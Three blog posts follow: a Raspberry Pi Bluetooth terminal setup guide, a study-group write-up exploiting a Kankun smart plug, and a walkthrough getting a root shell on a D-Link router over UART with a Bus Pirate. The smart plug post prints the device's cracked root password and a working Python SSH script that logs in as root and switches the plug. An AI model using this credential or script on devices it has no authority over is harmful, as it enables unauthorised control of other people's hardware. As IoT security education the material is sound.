Connecting raspberry pi 3 to android via Blueterm

Just got a raspberry pi model 3 and planned out to do something that was related to Bluetooth as never implemented it while working with Arduino. And with raspberry pi it comes built in.

The blog will further describe upon, how we can achieve data transfers between android and raspberry pi. Here data specifically represents text.

The very first thing to do is to provide internet connection to the pi. It can be done by connecting RJ45 directly from router to the pi. This will assign it an IP using DHCP. Then using any Linux distro ssh into the raspberry using default login/password of raspbian ( While installing raspbian, ssh might not be open. Therefore, create a file named ssh (without extension) in the place where the OS is installed. In the pi reboot the created file will automatically enable ssh in it)

First, update and upgrade the raspbian using following commands:

# apt-get update

# apt-get upgrade

Now we need to install the required packages for establishing the Bluetooth connectivity. Bluez offers a command line utility bluetoothctl to manage Bluetooth devices.

# sudo apt-get install bluetooth blueman bluez

Then reboot the raspberry pi using a command

# sudo reboot

Now SSH again and run this command to make sure that bluetooth is active

# sudo hciconfig hci0 up

Type in

# bluetoothctl

Now type in the following commands in order

[bluetooth]# power on
[bluetooth]# agent on
[bluetooth]# discoverable on
[bluetooth]# pairable on
[bluetooth]# scan on

The scan on command lists the devices with Bluetooth on along with the device MAC address.

# pair { device MAC address }

# connect { device MAC address }

For most of the devices, there might be an error in connecting with the Bluetooth. To rectify it just add a line at the end in main.conf of Bluetooth, and run the above 2 commands again. 

DisablePlugins = pnat

This is kind of a bug……..

Now to communicate with raspberry using android we need a Bluetooth Terminal App which supports communication via RFCOMM socket. For this tutorial, I used Blueterm app( available on play store ).

Next, we set up the serial port and RFCOMM channel to listen to the bluetooth.

# sdptool add sp

# sudo rfcomm listen hci0&

The second command opens up a rfcomm connection and ‘&’ implies that even if we have to wait for the connection, we can get back our terminal. Now go to your blueterm app and at the bottom of the phone, click connect. As and when the app gets connected, we can see the MAC of the Bluetooth device connected along with the connection port i.e. /dev/rfcomm0 in this case.

To see anything that is being transmitted from phone to terminal, use the cat command on /dev/rfcomm0  and kudos! you will be able to see all the transmitted messages.

blue

I also write tech and security related blogs on My personal website

 

Exploiting the vulnerable Kankun smart plug

It has now been almost one year when we started to work on Internet of Things under IoT study group , an initiative by Null Bhopal chapter. Internet of Things have indeed makes a revolutionary change in the way we live, making it more comfortable. But it’s security still remains a point of concern. Small mistakes at the time of manufacturing can sometimes lead to heavy security breaches.

In this process of learning, one of our mentor, Mr. Anant Shrivastava, sponsored us a kankun smart plug and the loopholes present in it made it a perfect device for penetration testing.

The kankun smart plug is an ON/OFF switch that can be controlled by an app. In just a basic port scanning, it was found out that the smart plug has got SSH port open by default. And this makes the plug vulnerable to almost any kind of exploit that can be performed on an iot device.
i1

Initially started  with the manual. Google translate comes in handy ☺

The manual comes along with the plug that gives information of where to download the app from. The next step is to setup it up and connect the smart phone and smart plug to the same wifi network. And when successfully configured, the smart plug is added in the device list. Now the smart plug can be controlled remotely via mobile app. There is another feature “ Direct Mode” , where the smart plug acts as a station having SSID : OK_SP3 , and by default there is no password for the network.

i2

 

Exploitation phase

The very first thing to look for was the firmware. The reason being  that it gives the overview of the device’s software. Information such as the filesystem present, bootloader, the different binaries present can be of great help from a pentester’s point of view. Although the firmwares are available on the internet, but in case you are unable to find, the other approach can be to reverse engineer the app. But first you need to see the actual source code. There are many number of ways to get the source of apk file. Here we are going to use a tool named jadx that can be used  to extract the source code.

i3

 

Now next step is to analyse all the extracted files for any hardcoded URLs. The one way is to have a check all the files one by one but the process is time-consuming. Therefore intelligent use of grep can save us a lot of time.

i4

So here we use grep command with some switches that directly spits out the all url in all the file of all the sub-folders along with their line number. We started with Analysing Hangzhou folder. Luckily we found some hardcoded urls.

i5

 

The highlighted text in the above screenshot shows the hardcoded url in the file  PreferencesUtil.java. Since the url ends with .bin It could be the link to actual firmware. And yes, the app actually downloads this firmware from this url and flash it to the device. After downloading the firmware, run  binwalk on kkeps.bin binary file. And it provides you with loads of useful information such as :  LZMA compressed data, squashfs filesystem, so on and so forth. After getting this information, -e switch can be used for extracting the filesystem.

Binwalk can be downloaded as

#sudo apt-get install binwalk

And the further dependencies of binwalk can be resolved by running the script, that can be downloaded from the link

https://github.com/ReFirmLabs/binwalk/blob/master/deps.sh

# binwalk –e kkeps.bin    

i6

 

So here is the entire linux file system. So the next step would be to get the root password. Which is not very difficult if you have the entire file system.

 

# unshadow /etc/password  /etc/shadow > passwd.txt

i7

 

Cracking this with John the Ripper give Root password  which is p9z34c

CONTROLLING THE SMART PLUG WITH TERMINAL

Now that we know the root password We can directly ssh into the smart plug.

Now by default the kankun smart plug has ssh port open

i8

 

Turning ON and OFF the smart plug can easily done if we ssh into the smart plug. The root password is p9z34c. We have successfully extracted it.

Turning the smart plug off

# echo 0 > /sys/class/leds/tp-link:blue:relay/brightness

Turning the smart plug on

# echo 1 > /sys/class/leds/tp-link:blue:relay/brightness

This entire process can be done with the help of this python script  that I wrote. This script requires paramiko library.

“”

#apt-get install python-paramiko

import paramiko,sys

GREEN=’\033[92m’

BLUE=’\033[94m’

RED=’\033[91m’

RESET=’\x1b[0m’

if len(sys.argv) < 3:

print “args missing”

sys.exit(1)

host = sys.argv[1]

action = sys.argv[2]

ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

print BLUE +”[*]   connecting to device”+ RESET

ssh.connect(host, username=’root’, password=’p9z34c’)

path=’/sys/class/leds/tp-link:blue:relay/brightness’

if sys.argv[2] == ‘on’:

ssh.exec_command(‘echo 1 >’ + path)

print GREEN +”[*]   turning it ” + action +””+RESET

elif sys.argv[2] == ‘off’:

ssh.exec_command(‘echo 0 >’ + path)

print RED +”[*]   turning it ” + action +””+RESET

ssh.close()

“”

That Is how we successfully managed to control the smart plug remotely without their Android app. ☺

This report is drafted under the IoT study group, an initiative by Null Bhopal chapter.

Thanks for reading!!

I also write tech and security related blogs on My personal website

Contributers :

Shreya Pohekar

Deepanshu Gajbhiye

 

Getting the router shell using UART interface and bus pirate

There are many means to extract file system from the firmware. One of the way is to use tools like binwalk, firmware analysis toolkit (FAT). But what, if you don’t have the firmware?

Well, in that case the physical access to the device can be fruitful. Interfaces available in the device can be used for directly getting the filesystem without even requiring the firmware. UART (Universal Asynchronous  Receiver Transmitter) is one of the popular interfaces that transmits serial data. And much of the iot devices such as routers, smart plug etc uses uart as one of their serial interfaces. This uart interfacing can be used up by tools like bus pirate for device communication, debugging and hardware hacking.

In this post i would be getting the shell out of the router through the uart interfacing and using bus pirate for communication.

I am using bus pirate v4 , having firmware version :- Community Firmware v7.0 – goo.gl/gCzQnW [HiZ 1-WIRE UART I2C SPI 2WIRE 3WIRE KEYB LCD PIC DIO]
DEVID:0x1019 REVID:0x0004 (24FJ256GB106 UNK)
dangerous prototypes

bpv4n1_03

And a D-Link DIR-600L router for this overall experimentation.

Inked20180519_215331_LI

The headers that are boxed show the UART ports.

But important is to identify, which one of the four is transmitter(Tx), receiver(Rx), ground(GND), VCC.

The ground can be found out using the continuity test in multimeter. One of the pin of the multimeter is connected to the metallic surface and the other pin is kept on these broken headers. The header that produces beep sound on being touched is the ground.

The VCC can be found out using the voltage test. One of the pin is kept on the identified ground and other on any of the 3 pins. If you get a constant high voltage means that it is a VCC pin . The other 2 headers can be identified by just hit and trial method.

multimeter

When all the 3 uart ports( TX, RX, GND) are identified connect these with bus pirate as

Router——> Bus Pirate

GND ——–> GND

TX ———–> MISO

RX ———–> MOSI

Mode-guide

And connect the bus pirate to the PC using . The serial communication to the bus pirate can be done using putty .Change the COM port as is initialized in your computer, and set the baud rate to 115200 (recommended).

6

7

Under the serial tab, change the Flow control to none and click open. This opens up a terminal where default mode is HiZ i.e. High Impedance. Now follow the commands as are executed in the screenshot below:

1

m is the mode on which to work. When a particular mode is set, the mode led in the bus pirate lights up. In baud rate, Auto-baud detection is selected so that the output terminal comes in a readable format. Rest all options are set to default.

2

In UART, the power supply is turned ON using the command line and can be done by just pressing W. If you don’t get the message clutch engaged, then try out restarting the router at that moment. Then in the macro menu, transparent bridge is used that takes us to the shell of the router, even without any user name password. The awesome thing is that we get a root shell.

3

The above screenshot shows the booting process of the router.

4

The above screenshot shows the whole filesystem of the router.

In this way, we can shell full access to the linux filesystem just by the interfacing ports such as UART (as in this case).

You can also go through the various files in the system to get some important information regarding the device such as the password file shows that there are only 2 users.

5

I also write on technology and security blogs on My personal website

 

SHREYA POHEKAR
DEEPANSHU GAJBHIYE